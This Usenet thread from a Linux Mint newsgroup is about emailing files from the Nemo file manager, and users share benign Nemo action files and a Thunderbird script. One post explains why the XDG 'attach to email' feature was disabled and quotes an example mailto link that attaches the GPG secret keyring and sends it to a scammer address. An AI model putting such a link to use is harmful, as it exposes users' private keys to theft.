Slowly and surely the unix crept up on the Nintendo user ...

computers / alt.os.linux.mint / Nemo Actions (Was: Is it possible to to email a file from NEMO?)

SubjectAuthor
* Is it possible to to email a file from NEMO?Nic
`* Re: Is it possible to to email a file from NEMO?Mike Easter
 +- Re: Is it possible to to email a file from NEMO?Nic
 +* Re: Is it possible to to email a file from NEMO?Big Al
 |+- Re: Is it possible to to email a file from NEMO?Big Al
 |+* Re: Is it possible to to email a file from NEMO?Nic
 ||`* Re: Is it possible to to email a file from NEMO?Nic
 || `- Re: Is it possible to to email a file from NEMO?Big Al
 |`* Re: Is it possible to to email a file from NEMO?Yrrah
 | `* Re: Is it possible to to email a file from NEMO?Big Al
 |  `* Nemo Actions (Was: Is it possible to to email a file from NEMO?)Yrrah
 |   `- Re: Nemo Actions (Was: Is it possible to to email a file from NEMO?)Big Al
 `* Re: Is it possible to to email a file from NEMO?Dan Purgert
  `- Re: Is it possible to to email a file from NEMO?Nic

1
Is it possible to to email a file from NEMO?

<IcD0M.2361078$9sn9.157771@fx17.iad>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5934&group=alt.os.linux.mint#5934

Newsgroups: alt.os.linux.mint
From: Nic...@none.net (Nic)
Subject: Is it possible to to email a file from NEMO?
Date: Fri, 21 Apr 2023 17:27:04 -0400
 by: Nic - Fri, 21 Apr 2023 21:27 UTC

I would like to be able to email a file while viewing in NEMO file
manager. PDF or Text.

--
Pity the fool who followed his GPS over the cliff

Re: Is it possible to to email a file from NEMO?

<kagnk0Fbq3cU1@mid.individual.net>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5935&group=alt.os.linux.mint#5935

From: Mik...@ster.invalid (Mike Easter)
Newsgroups: alt.os.linux.mint
Subject: Re: Is it possible to to email a file from NEMO?
Date: Fri, 21 Apr 2023 17:21:19 -0700
 by: Mike Easter - Sat, 22 Apr 2023 00:21 UTC

Nic wrote:
> I would like to be able to email a file while viewing in NEMO file
> manager. PDF or Text.

I haven't actually tested this (very far) but I think that you can R
click your target file and use Nemo's 'open with' function and then
direct it to be opened w/ such as Thunderbird and the file will become
an attachment to a Tb mail.

Assuming that you want to be able to email the file via a client you
have installed, as opposed to some webmailer.

As far as I know, there are no Nemo plugins that afford an 'email' in
the context menu directly.

Now I'm reading in the Mint forum that there WAS a send by email
function in a past Nemo which was removed.

See this thread:
https://forums.linuxmint.com/viewtopic.php?t=345153 Nemo - would like
to get "send by email" context menu

I didn't read all of the thread but at first glance it looked like
someone knew how to 'restore' it.

--
Mike Easter

Re: Is it possible to to email a file from NEMO?

<20230422072013.12f5d613e7a631ae1db7eb88@none.net>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5938&group=alt.os.linux.mint#5938

From: Nic...@none.net (Nic)
Newsgroups: alt.os.linux.mint
Date: Sat, 22 Apr 2023 07:20:13 -0400
 by: Nic - Sat, 22 Apr 2023 11:20 UTC

On Fri, 21 Apr 2023 17:21:19 -0700
Mike Easter <MikeE@ster.invalid> wrote:

>Nic wrote:
>> I would like to be able to email a file while viewing in NEMO file
>> manager. PDF or Text.
>
>I haven't actually tested this (very far) but I think that you can R
>click your target file and use Nemo's 'open with' function and then
>direct it to be opened w/ such as Thunderbird and the file will become
>an attachment to a Tb mail.
>
>Assuming that you want to be able to email the file via a client you
>have installed, as opposed to some webmailer.
>
>As far as I know, there are no Nemo plugins that afford an 'email' in
>the context menu directly.
>
>Now I'm reading in the Mint forum that there WAS a send by email
>function in a past Nemo which was removed.
>
>See this thread:
>https://forums.linuxmint.com/viewtopic.php?t=345153 Nemo - would like
>to get "send by email" context menu
>
>I didn't read all of the thread but at first glance it looked like
>someone knew how to 'restore' it.
>

>--
>Mike Easter

Thanks Mike, mark that as another improvement in updating from 19.3 to 20.3. FYI the method that you outlined of 'open with' in TB works.

Re: Is it possible to to email a file from NEMO?

<u20i1p$38rc5$1@dont-email.me>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5939&group=alt.os.linux.mint#5939

From: Bea...@invalid.com (Big Al)
Newsgroups: alt.os.linux.mint
Date: Sat, 22 Apr 2023 07:56:39 -0400
 by: Big Al - Sat, 22 Apr 2023 11:56 UTC

On 4/21/23 20:21, this is what Mike Easter wrote:
> Nic wrote:
>> I would like to be able to email a file while viewing in NEMO file manager. PDF or Text.
>
> I haven't actually tested this (very far) but I think that you can R click your target file and use Nemo's 'open with'
> function and then direct it to be opened w/ such as Thunderbird and the file will become an attachment to a Tb mail.
>
> Assuming that you want to be able to email the file via a client you have installed, as opposed to some webmailer.
>
> As far as I know, there are no Nemo plugins that afford an 'email' in the context menu directly.
>
> Now I'm reading in the Mint forum that there WAS a send by email function in a past Nemo which was removed.
>
> See this thread:
> https://forums.linuxmint.com/viewtopic.php?t=345153  Nemo - would like to get "send by email" context menu
>
> I didn't read all of the thread but at first glance it looked like someone knew how to 'restore' it.

I think you're right. I had to make my own 'nemo action' to do just this.
If you're game to try it's not hard.

Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
extension .nemo_action, no spaces in the filename. (between the ---- lines)
-------------------
[Nemo Action]
Name=Send by TBird
Comment=Send files with Thunderbird
Icon-Name=mail-mark-unread
Exec=<scripts/send-by-mail.sh "%F">
Selection=notnone
Extensions=nodirs;
EscapeSpaces=false
Active=true
-----------------------

Then in the actions/scripts folder make another file called 'send-by-mail.sh' and make it executable. Put this in it.
---------------------------------
#!/bin/bash
FILE=$1
BASENAME=`basename "${FILE}"`
if [ "a$BASENAME" != "a" ]
then
thunderbird -compose "subject='Sending $BASENAME',body='See Attachment File: $BASENAME',attachment='$FILE'"
fi
---------------------------------

It works for me. You can change the subject/body wording but watch out for typos.
It only works for one file not a selection of multiple files.
--
Al

Re: Is it possible to to email a file from NEMO?

<u20i5q$38rc5$2@dont-email.me>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5940&group=alt.os.linux.mint#5940

From: Bea...@invalid.com (Big Al)
Newsgroups: alt.os.linux.mint
Date: Sat, 22 Apr 2023 07:58:50 -0400
 by: Big Al - Sat, 22 Apr 2023 11:58 UTC

On 4/22/23 07:56, this is what Big Al wrote:
> On 4/21/23 20:21, this is what Mike Easter wrote:
>> Nic wrote:
>>> I would like to be able to email a file while viewing in NEMO file manager. PDF or Text.
>>
>> I haven't actually tested this (very far) but I think that you can R click your target file and use Nemo's 'open with'
>> function and then direct it to be opened w/ such as Thunderbird and the file will become an attachment to a Tb mail.
>>
>> Assuming that you want to be able to email the file via a client you have installed, as opposed to some webmailer.
>>
>> As far as I know, there are no Nemo plugins that afford an 'email' in the context menu directly.
>>
>> Now I'm reading in the Mint forum that there WAS a send by email function in a past Nemo which was removed.
>>
>> See this thread:
>> https://forums.linuxmint.com/viewtopic.php?t=345153  Nemo - would like to get "send by email" context menu
>>
>> I didn't read all of the thread but at first glance it looked like someone knew how to 'restore' it.
>>

> I think you're right.   I had to make my own 'nemo action' to do just this.
> If you're game to try it's not hard.
>
> Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
> extension .nemo_action, no spaces in the filename.     (between the ---- lines)
> -------------------
> [Nemo Action]
> Name=Send by TBird
> Comment=Send files with Thunderbird
> Icon-Name=mail-mark-unread
> Exec=<scripts/send-by-mail.sh "%F">
> Selection=notnone
> Extensions=nodirs;
> EscapeSpaces=false
> Active=true
> -----------------------
>
> Then in the actions/scripts folder make another file called 'send-by-mail.sh' and make it executable.  Put this in it.
> ---------------------------------
> #!/bin/bash
> FILE=$1
> BASENAME=`basename "${FILE}"`
> if [ "a$BASENAME" != "a" ]
>     then
>         thunderbird -compose "subject='Sending $BASENAME',body='See Attachment File: $BASENAME',attachment='$FILE'"
>     fi
> ---------------------------------
>
> It works for me.  You can change the subject/body wording but watch out for typos.
> It only works for one file not a selection of multiple files.
That 'thunderbird -compose' line is one line all the way thru attachment='$FILE'
--
Al

Re: Is it possible to to email a file from NEMO?

<20230422100123.2b94540a1fdc2d53d92c049c@none.net>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5941&group=alt.os.linux.mint#5941

From: Nic...@none.net (Nic)
Newsgroups: alt.os.linux.mint
Date: Sat, 22 Apr 2023 10:01:23 -0400
 by: Nic - Sat, 22 Apr 2023 14:01 UTC

On Sat, 22 Apr 2023 07:56:39 -0400
Big Al <Bears@invalid.com> wrote:

>On 4/21/23 20:21, this is what Mike Easter wrote:
>> Nic wrote:
>>> I would like to be able to email a file while viewing in NEMO file manager. PDF or Text.
>>
>> I haven't actually tested this (very far) but I think that you can R click your target file and use Nemo's 'open with'
>> function and then direct it to be opened w/ such as Thunderbird and the file will become an attachment to a Tb mail.
>>
>> Assuming that you want to be able to email the file via a client you have installed, as opposed to some webmailer.
>>
>> As far as I know, there are no Nemo plugins that afford an 'email' in the context menu directly.
>>
>> Now I'm reading in the Mint forum that there WAS a send by email function in a past Nemo which was removed.
>>
>> See this thread:
>> https://forums.linuxmint.com/viewtopic.php?t=345153  Nemo - would like to get "send by email" context menu
>>
>> I didn't read all of the thread but at first glance it looked like someone knew how to 'restore' it.
>>

>I think you're right. I had to make my own 'nemo action' to do just this.
>If you're game to try it's not hard.
>
>Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
>extension .nemo_action, no spaces in the filename. (between the ---- lines)
>-------------------
>[Nemo Action]
>Name=Send by TBird
>Comment=Send files with Thunderbird
>Icon-Name=mail-mark-unread
>Exec=<scripts/send-by-mail.sh "%F">
>Selection=notnone
>Extensions=nodirs;
>EscapeSpaces=false
>Active=true
>-----------------------
>
>Then in the actions/scripts folder make another file called 'send-by-mail.sh' and make it executable. Put this in it.
>---------------------------------
>#!/bin/bash
>FILE=$1
>BASENAME=`basename "${FILE}"`
>if [ "a$BASENAME" != "a" ]
> then
> thunderbird -compose "subject='Sending $BASENAME',body='See Attachment File: $BASENAME',attachment='$FILE'"
> fi
>---------------------------------
>
>It works for me. You can change the subject/body wording but watch out for typos.
>It only works for one file not a selection of multiple files.
>--
> Al

I generally follow the rule that the less complexity the better, the 'send to' method works with a lot less complexity. Thanks for your solution.

Re: Is it possible to to email a file from NEMO?

<20230422100628.6045ad3c075d8234aaebc8e6@none.net>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5942&group=alt.os.linux.mint#5942

From: Nic...@none.net (Nic)
Newsgroups: alt.os.linux.mint
Date: Sat, 22 Apr 2023 10:06:28 -0400
 by: Nic - Sat, 22 Apr 2023 14:06 UTC

On Sat, 22 Apr 2023 10:01:23 -0400
Nic <Nic@none.net> wrote:

>On Sat, 22 Apr 2023 07:56:39 -0400
>Big Al <Bears@invalid.com> wrote:

>>> I haven't actually tested this (very far) but I think that you can R click your target file and use Nemo's 'open with'
>>> function and then direct it to be opened w/ such as Thunderbird and the file will become an attachment to a Tb mail.
>>>
>>> Assuming that you want to be able to email the file via a client you have installed, as opposed to some webmailer.
>>>
>>> As far as I know, there are no Nemo plugins that afford an 'email' in the context menu directly.
>>>
>>> Now I'm reading in the Mint forum that there WAS a send by email function in a past Nemo which was removed.
>>>
>>> See this thread:
>>> https://forums.linuxmint.com/viewtopic.php?t=345153  Nemo - would like to get "send by email" context menu
>>>
>>> I didn't read all of the thread but at first glance it looked like someone knew how to 'restore' it.
>>>

>>I think you're right. I had to make my own 'nemo action' to do just this.
>>If you're game to try it's not hard.
>>
>>Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
>>extension .nemo_action, no spaces in the filename. (between the ---- lines)
>>-------------------
>>[Nemo Action]
>>Name=Send by TBird
>>Comment=Send files with Thunderbird
>>Icon-Name=mail-mark-unread
>>Exec=<scripts/send-by-mail.sh "%F">
>>Selection=notnone
>>Extensions=nodirs;
>>EscapeSpaces=false
>>Active=true
>>-----------------------
>>
>>Then in the actions/scripts folder make another file called 'send-by-mail..sh' and make it executable. Put this in it.
>>---------------------------------
>>#!/bin/bash
>>FILE=$1
>>BASENAME=`basename "${FILE}"`
>>if [ "a$BASENAME" != "a" ]
>> then
>> thunderbird -compose "subject='Sending $BASENAME',body='See Attachment File: $BASENAME',attachment='$FILE'"
>> fi
>>---------------------------------
>>
>>It works for me. You can change the subject/body wording but watch out for typos.
>>It only works for one file not a selection of multiple files.
>>--
>> Al
>>

>I generally follow the rule that the less complexity the better, the 'send to' method works with a lot less complexity. Thanks for your solution.

I meant 'open with' works for sending mail.

Re: Is it possible to to email a file from NEMO?

<u210uv$3b8t1$1@dont-email.me>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5943&group=alt.os.linux.mint#5943

From: Bea...@invalid.com (Big Al)
Newsgroups: alt.os.linux.mint
Date: Sat, 22 Apr 2023 12:11:11 -0400
 by: Big Al - Sat, 22 Apr 2023 16:11 UTC

On 4/22/23 10:06, this is what Nic wrote:
> On Sat, 22 Apr 2023 10:01:23 -0400
> Nic <Nic@none.net> wrote:
>
>> On Sat, 22 Apr 2023 07:56:39 -0400
>> Big Al <Bears@invalid.com> wrote:

>>> I think you're right. I had to make my own 'nemo action' to do just this.
>>> If you're game to try it's not hard.
>>>
>>> Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
>>> extension .nemo_action, no spaces in the filename. (between the ---- lines)
>>> -------------------
>>> [Nemo Action]
>>> Name=Send by TBird
>>> Comment=Send files with Thunderbird
>>> Icon-Name=mail-mark-unread
>>> Exec=<scripts/send-by-mail.sh "%F">
>>> Selection=notnone
>>> Extensions=nodirs;
>>> EscapeSpaces=false
>>> Active=true
>>> -----------------------
>>>
>>> Then in the actions/scripts folder make another file called 'send-by-mail.sh' and make it executable. Put this in it.
>>> ---------------------------------
>>> #!/bin/bash
>>> FILE=$1
>>> BASENAME=`basename "${FILE}"`
>>> if [ "a$BASENAME" != "a" ]
>>> then
>>> thunderbird -compose "subject='Sending $BASENAME',body='See Attachment File: $BASENAME',attachment='$FILE'"
>>> fi
>>> ---------------------------------
>>>
>>> It works for me. You can change the subject/body wording but watch out for typos.
>>> It only works for one file not a selection of multiple files.
>>> --
>>> Al
>>>

>> I generally follow the rule that the less complexity the better, the 'send to' method works with a lot less complexity. Thanks for your solution.
>
> I meant 'open with' works for sending mail.
That's the nice thing about linux, there's always more than one way to skin a cat.
--
Al

Re: Is it possible to to email a file from NEMO?

<slrnu4clri.p0u.dan@djph.net>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5946&group=alt.os.linux.mint#5946

From: dan...@djph.net (Dan Purgert)
Newsgroups: alt.os.linux.mint
Date: Mon, 24 Apr 2023 10:17:23 -0000 (UTC)
 by: Dan Purgert - Mon, 24 Apr 2023 10:17 UTC

On 2023-04-22, Mike Easter wrote:
> Nic wrote:
>> I would like to be able to email a file while viewing in NEMO file
>> manager. PDF or Text.
> [...]
> Now I'm reading in the Mint forum that there WAS a send by email
> function in a past Nemo which was removed.
>
> See this thread:
> https://forums.linuxmint.com/viewtopic.php?t=345153 Nemo - would like
> to get "send by email" context menu

The XDG Utils implementation of the "attach to email" context menu
option was exploitable.

Essentially, a questionable website could set a mailto: link as
"mailto:scammer@scammer.com?attach=~/.gnupg/secring.gpg"
and get your secret keyring. So the freedesktop.org guys disabled it,
meaning downstream tools that implement XDG Utils (such as Cinnamon's
Nemo, among other things)

Bit annoying for some (and probably more of a hypothetical attack than
used in reality), but then again better that they didn't ignore the
possibility.

--
|_|O|_|

Re: Is it possible to to email a file from NEMO?

<q5u1M.317548$SdR7.23082@fx04.iad>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5947&group=alt.os.linux.mint#5947

Newsgroups: alt.os.linux.mint
From: Nic...@none.net (Nic)
Date: Mon, 24 Apr 2023 07:53:58 -0400
 by: Nic - Mon, 24 Apr 2023 11:53 UTC

On 4/24/23 06:17, Dan Purgert wrote:
> On 2023-04-22, Mike Easter wrote:
>> Nic wrote:
>>> I would like to be able to email a file while viewing in NEMO file
>>> manager. PDF or Text.
>> [...]
>> Now I'm reading in the Mint forum that there WAS a send by email
>> function in a past Nemo which was removed.
>>
>> See this thread:
>> https://forums.linuxmint.com/viewtopic.php?t=345153 Nemo - would like
>> to get "send by email" context menu
> The XDG Utils implementation of the "attach to email" context menu
> option was exploitable.
>
> Essentially, a questionable website could set a mailto: link as
> "mailto:scammer@scammer.com?attach=~/.gnupg/secring.gpg"
> and get your secret keyring. So the freedesktop.org guys disabled it,
> meaning downstream tools that implement XDG Utils (such as Cinnamon's
> Nemo, among other things)
>
> Bit annoying for some (and probably more of a hypothetical attack than
> used in reality), but then again better that they didn't ignore the
> possibility.

Thanks for the explanation. Mike did provide an easy way for sending
email that works, for now.
-----https://freedesktop.org/wiki/Software/xdg-utils/

Re: Is it possible to to email a file from NEMO?

<llsc4id0f89lbgocjr99k8sr4be9h990n7@net.com>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5948&group=alt.os.linux.mint#5948

From: Yrrah-a...@aolm.invalid (Yrrah)
Newsgroups: alt.os.linux.mint
Sender: Yrrah <Yrrah-aolm@aolm.invalid>
Date: Mon, 24 Apr 2023 14:15:59 +0200
 by: Yrrah - Mon, 24 Apr 2023 12:15 UTC

Big Al <Bears@invalid.com>:

> I think you're right. I had to make my own 'nemo action' to do just this.
> If you're game to try it's not hard.
>
> Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
> extension .nemo_action, no spaces in the filename. (between the ---- lines)
> -------------------
> [Nemo Action]
> Name=Send by TBird
> Comment=Send files with Thunderbird
> Icon-Name=mail-mark-unread
> Exec=<scripts/send-by-mail.sh "%F">
> Selection=notnone
> Extensions=nodirs;
> EscapeSpaces=false
> Active=true
> -----------------------

Claws Mail:

[Nemo Action]
Name=Send with Claws Mail
Comment=Send files with Claws Mail
Icon-Name=claws-mail
Exec=claws-mail --attach %F
Selection=notnone
Extensions=nodirs;
EscapeSpaces=false
Active=true

Works (here) with multiple files.
(No script required.)

Nice feature, Nemo actions. Must experiment with them.

Syntax info in this (sample) action file:
<https://github.com/linuxmint/nemo/blob/master/files/usr/share/nemo/actions/sample.nemo_action>

Yrrah
(LM 21.1 Cinnamon; Claws Mail 4.0.0)

Re: Is it possible to to email a file from NEMO?

<u26g1q$eh4d$1@dont-email.me>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5959&group=alt.os.linux.mint#5959

From: Bea...@invalid.com (Big Al)
Newsgroups: alt.os.linux.mint
Date: Mon, 24 Apr 2023 13:59:20 -0400
 by: Big Al - Mon, 24 Apr 2023 17:59 UTC

On 4/24/23 08:15, this is what Yrrah wrote:
> Big Al <Bears@invalid.com>:
>
>> I think you're right. I had to make my own 'nemo action' to do just this.
>> If you're game to try it's not hard.
>>
>> Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
>> extension .nemo_action, no spaces in the filename. (between the ---- lines)
>> -------------------
>> [Nemo Action]
>> Name=Send by TBird
>> Comment=Send files with Thunderbird
>> Icon-Name=mail-mark-unread
>> Exec=<scripts/send-by-mail.sh "%F">
>> Selection=notnone
>> Extensions=nodirs;
>> EscapeSpaces=false
>> Active=true
>> -----------------------
>
> Claws Mail:
>
> [Nemo Action]
> Name=Send with Claws Mail
> Comment=Send files with Claws Mail
> Icon-Name=claws-mail
> Exec=claws-mail --attach %F
> Selection=notnone
> Extensions=nodirs;
> EscapeSpaces=false
> Active=true
>
> Works (here) with multiple files.
> (No script required.)
>
> Nice feature, Nemo actions. Must experiment with them.
>
> Syntax info in this (sample) action file:
> <https://github.com/linuxmint/nemo/blob/master/files/usr/share/nemo/actions/sample.nemo_action>
>

> Yrrah
> (LM 21.1 Cinnamon; Claws Mail 4.0.0)
I love it. I've created actions to convert PNGs to JPGs.
I create a really useful action to take the photos from my camera PXL_date_time.jpg and convert it so a
YY-MM-DD_comment.jpg I like sorting images by date and labeling that way in case I edit and change date.
--
Al

Nemo Actions (Was: Is it possible to to email a file from NEMO?)

<g0if4il74q69hkfa6soeu78qt3hhvnoh8q@net.com>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5967&group=alt.os.linux.mint#5967

From: Yrrah-a...@aolm.invalid (Yrrah)
Newsgroups: alt.os.linux.mint
Subject: Nemo Actions (Was: Is it possible to to email a file from NEMO?)
Sender: Yrrah <Yrrah-aolm@aolm.invalid>
Date: Tue, 25 Apr 2023 14:47:30 +0200
 by: Yrrah - Tue, 25 Apr 2023 12:47 UTC

Perhaps it's not a bad idea to start a separate thread with a new
subject: Nemo Actions.

> Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
> extension .nemo_action, no spaces in the filename.

> >> [Nemo Action]
> >> Name=Send by TBird
> >> Comment=Send files with Thunderbird
> >> Icon-Name=mail-mark-unread
> >> Exec=<scripts/send-by-mail.sh "%F">
> >> Selection=notnone
> >> Extensions=nodirs;
> >> EscapeSpaces=false
> >> Active=true

> > [Nemo Action]
> > Name=Send with Claws Mail
> > Comment=Send files with Claws Mail
> > Icon-Name=claws-mail
> > Exec=claws-mail --attach %F
> > Selection=notnone
> > Extensions=nodirs;
> > EscapeSpaces=false
> > Active=true

> > Syntax info in this (sample) action file:
> > <https://github.com/linuxmint/nemo/blob/master/files/usr/share/nemo/actions/sample.nemo_action>

> I love it. I've created actions to convert PNGs to JPGs.
> I create a really useful action to take the photos from my camera PXL_date_time.jpg and convert it so a
> YY-MM-DD_comment.jpg I like sorting images by date and labeling that way in case I edit and change date.

Big Al, care to share them with us?

Various examples here:

https://wiki.archlinux.org/title/Nemo#Nemo_Actions

https://github.com/smurphos/nemo_actions_and_cinnamon_scripts

Your Nemo actions, tips & tricks?

Yrrah

Re: Nemo Actions (Was: Is it possible to to email a file from NEMO?)

<u28rgp$u067$1@dont-email.me>

  copy mid

https://www.novabbs.com/computers/article-flat.php?id=5968&group=alt.os.linux.mint#5968

From: Bea...@invalid.com (Big Al)
Newsgroups: alt.os.linux.mint
Date: Tue, 25 Apr 2023 11:27:19 -0400
 by: Big Al - Tue, 25 Apr 2023 15:27 UTC

On 4/25/23 08:47, this is what Yrrah wrote:
> Perhaps it's not a bad idea to start a separate thread with a new
> subject: Nemo Actions.
>
>> Put this in a file in ~/.local/share/nemo/actions, and call it what you want to see on the right-click menu but use the
>> extension .nemo_action, no spaces in the filename.

>>> [Nemo Action]
>>> Name=Send with Claws Mail
>>> Comment=Send files with Claws Mail
>>> Icon-Name=claws-mail
>>> Exec=claws-mail --attach %F
>>> Selection=notnone
>>> Extensions=nodirs;
>>> EscapeSpaces=false
>>> Active=true
>
>>> Syntax info in this (sample) action file:
>>> <https://github.com/linuxmint/nemo/blob/master/files/usr/share/nemo/actions/sample.nemo_action>
>
>> I love it. I've created actions to convert PNGs to JPGs.
>> I create a really useful action to take the photos from my camera PXL_date_time.jpg and convert it so a
>> YY-MM-DD_comment.jpg I like sorting images by date and labeling that way in case I edit and change date.
>
> Big Al, care to share them with us?
>
> Various examples here:
>
> https://wiki.archlinux.org/title/Nemo#Nemo_Actions
>
> https://github.com/smurphos/nemo_actions_and_cinnamon_scripts
>
> Your Nemo actions, tips & tricks?
>
> Yrrah

I've posted an "issue" to githubm/smurphos with a zip file. You can see the 4 or 6 I made.

--
Al